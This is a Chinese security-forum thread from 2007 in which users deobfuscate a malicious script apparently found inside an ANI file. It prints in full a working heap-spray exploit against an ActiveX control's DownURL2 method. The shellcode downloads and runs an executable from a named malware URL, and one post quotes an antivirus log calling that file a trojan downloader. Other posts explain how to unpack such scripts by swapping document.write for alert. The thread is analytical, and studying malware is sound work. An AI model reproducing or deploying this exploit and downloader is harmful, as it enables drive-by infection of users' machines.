ANI马也可以加密??!!

孤独更可靠

有点无厘头了,不知道怎么实现的



里面没发现算法和加密函数..


请高手指教!

jimmyleo

1. 
   
2. <object classid="clsid:EEDD6FF9-13DE-496B-9A1C-D78B3215E266" style='display:none' id='target'></object>
   
3. <SCRIPT language="javascript">
   
4. var she132132132132llc13ode = unescape("%u9090"+"%u9090"+
   
5. "%uefe9%u0000%u5a00%ua164%u0030%u0000%u408b%u8b0c" +
   
6. "%u1c70%u8bad%u0840%ud88b%u738b%u8b3c%u1e74%u0378" +
   
7. "%u8bf3%u207e%ufb03%u4e8b%u3314%u56ed%u5157%u3f8b" +
   
8. "%ufb03%uf28b%u0e6a%uf359%u74a6%u5908%u835f%u04c7" +
   
9. "%ue245%u59e9%u5e5f%ucd8b%u468b%u0324%ud1c3%u03e1" +
   
10. "%u33c1%u66c9%u088b%u468b%u031c%uc1c3%u02e1%uc103" +
    
11. "%u008b%uc303%ufa8b%uf78b%uc683%u8b0e%u6ad0%u5904" +
    
12. "%u6ae8%u0000%u8300%u0dc6%u5652%u57ff%u5afc%ud88b" +
    
13. "%u016a%ue859%u0057%u0000%uc683%u5613%u8046%u803e" +
    
14. "%ufa75%u3680%u5e80%uec83%u8b40%uc7dc%u6303%u646d" +
    
15. "%u4320%u4343%u6643%u03c7%u632f%u4343%u03c6%u4320" +
    
16. "%u206a%uff53%uec57%u04c7%u5c03%u2e61%uc765%u0344" +
    
17. "%u7804%u0065%u3300%u50c0%u5350%u5056%u57ff%u8bfc" +
    
18. "%u6adc%u5300%u57ff%u68f0%u2451%u0040%uff58%u33d0" +
    
19. "%uacc0%uc085%uf975%u5251%u5356%ud2ff%u595a%ue2ab" +
    
20. "%u33ee%uc3c0%u0ce8%uffff%u47ff%u7465%u7250%u636f" +
    
21. "%u6441%u7264%u7365%u0073%u6547%u5374%u7379%u6574" +
    
22. "%u446d%u7269%u6365%u6f74%u7972%u0041%u6957%u456e" +
    
23. "%u6578%u0063%u7845%u7469%u6854%u6572%u6461%u4c00" +
    
24. "%u616f%u4c64%u6269%u6172%u7972%u0041%u7275%u6d6c" +
    
25. "%u6e6f%u5500%u4c52%u6f44%u6e77%u6f6c%u6461%u6f54" +
    
26. "%u6946%u656c%u0041" +
    
27. "%u7468%u7074%u2f3a%u772f%u7777%u2e31%u3133%u6f6a%u2e79%u6f63%u2f6d%u3353%u3836%u532f%u3633%u3238%u652e%u6578%u0000");
    
28. </script>
    
29. <SCRIPT language="javascript">
    
30. var Is1No2p136312 = '1cdc';
    
31. var bi3123g123665blo2131ck = unescape("%u9090%u9090");
    
32. var Is1No2p136312 = '1cdc';
    
33. var he132132aders123132ize = 20;
    
34. var Is1No2p136312 = '1cdc';
    
35. var sl21123112ack312231312space = he132132aders123132ize+she132132132132llc13ode.length;
    
36. var Is1No2p136312 = '1cdc';
    
37. while (bi3123g123665blo2131ck.length<sl21123112ack312231312space) bi3123g123665blo2131ck+=bi3123g123665blo2131ck;
    
38. fillblock = bi3123g123665blo2131ck.substring(0, sl21123112ack312231312space);
    
39. block = bi3123g123665blo2131ck.substring(0, bi3123g123665blo2131ck.length-sl21123112ack312231312space);
    
40. while(block.length+sl21123112ack312231312space<0x40000) block = block+block+fillblock;
    
41. memory = new Array();
    
42. for (x=0; x<300; x++) memory[x] = block + she132132132132llc13ode;
    
43. var d1u21fc32erc = '';
    
44. var Is1No2p136312 = '1cdc';
    
45. var Is1No2p136312 = '1cdc';
    
46. while (d1u21fc32erc.length < 4057) d1u21fc32erc+="\x0a\x0a\x0a\x0a";
    
47. d1u21fc32erc+="\x0a";
    
48. d1u21fc32erc+="\x0a";
    
49. d1u21fc32erc+="\x0a";
    
50. d1u21fc32erc+="\x0a\x0a\x0a\x0a";
    
51. d1u21fc32erc+="\x0a\x0a\x0a\x0a";
    
52. var yes="1111";
    
53. var Is1No2p136312 = '1cdc';
    
54. target.DownURL2(d1u21fc32erc,yes,yes,yes);
    
55. var Is1No2p136312 = '1cdc';
    
56. </script>

复制代码

第一层

孤独更可靠

咦?

MS06-14的?

如果包涵在ANI中,应该不起作用啊?

你怎么获得里面代码的??

jimmyleo

1. 
   
2. hxxp://www1.31joy.com/S368/S3682.exe
   

复制代码

第二层 shellcode

jimmyleo

关键是找到write
然后替换成textarea的value甩到textarea里去或者改为alert执行即可
这是特殊函数的通用解法

[ 本帖最后由 jimmyleo 于 2007-9-9 17:38 编辑 ]

孤独更可靠

强人啊,

请教

怎么解的

孤独更可靠

哎,还是不懂..




不过还是学习了

jimmyleo

具体讲讲其中一种方法吧
呵呵~

就是找到document.write(w);
据经验判断 这个是最终执行语句
所以只要替换这一句

改成alert(w);
保存为html
打开看看 你看到了什么 呵呵~

buycard

改Alert不是万能的

hj5abc

2007-9-9 17:45:58 HTTP filter file http://www1.31joy.com/S368/S3682.exe a variant of Win32/TrojanDownloader.Tiny.Y trojan connection terminated - quarantined Threat was detected upon access to web by the application: e:\my soft\theworld\theworld.exe.